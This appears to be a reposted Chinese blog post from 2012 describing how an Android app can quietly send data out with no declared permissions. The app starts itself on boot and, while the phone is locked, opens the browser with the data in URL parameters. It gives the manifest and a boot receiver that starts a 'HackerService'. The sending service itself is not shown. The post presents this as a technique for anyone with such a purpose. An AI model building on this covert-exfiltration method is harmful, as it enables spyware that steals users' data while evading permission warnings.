拋磚引玉之誰動了我的流量(0權限上傳數據)
作者: 來源: 發布時間:2012-1-14 10:40:08 點擊:
上次寫過一篇文章 拋磚引玉 之 誰動了我的隱私(android用戶隱私窺探) 描述如何讀取系統log緩沖區但還存在權限提示問題。
這次來個稍微好點的,真正的0權限上傳數據
同上次講的一樣,雖然大部分用戶在安裝app時對權限警告視而不見,但相信以后用戶會對權限問題越來越重視的。
這次咱們先真正的來一次0權限上傳熱熱身。
一、原理
首先利用的還是那個開機啟動bug。
然后,在手機鎖屏時上傳數據。
如何上傳數據呢,為了避免權限咱們得瞞天過海。
我們知道,在Intent轉向的時候,可以轉到標記為ACTION_VIEW的activity,而瀏覽器都有這個標記,可以傳一個uri過去。
soga,說到這里,,明白了吧。就是使用http的GET傳參,雖然只能傳明文,但已經夠了,更何況一次能傳輸的字節也還是很客觀的。
至于傳什么,每個想實現這種功能的人都有其目的吧。
二、實現
首先是清單文件,不需要聲明任何權限,只需要寫一個廣播接收者和一個服務即可
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="org.igeek.hack"
android:versionCode="1"
android:versionName="1.0">
<uses-sdk android:minSdkVersion="8" />
<application android:icon="@drawable/icon" android:label="@string/app_name">
<receiver android:name =".reciver.HackReceiver">
<intent-filter android:priority ="1000">
<action android:name ="android.intent.action.BOOT_COMPLETED"/>
</intent-filter >
</receiver >
<service android:name=".service.HackerService"/>
</application>
</manifest>
然后就是廣播接收者的實現,很簡單,單純的開啟一個服務
package org.igeek.hack.reciver;
import org.igeek.hack.service.HackerService;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
/**
* @author 作者 E-mail:hangxin1940@gmail.com
* @version 創建時間:2012-01-13 下午10:32:21
* 類說明
*/
public class HackReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
Intent it=new Intent(context, HackerService.class);
context.startService(it);
}
}
Tags:
拋磚引玉之誰動了我的流量(0權限上傳數據)上一篇:20 個很有用的 CSS 圖形和圖表技術和教程 下一篇:
[收藏此文章]
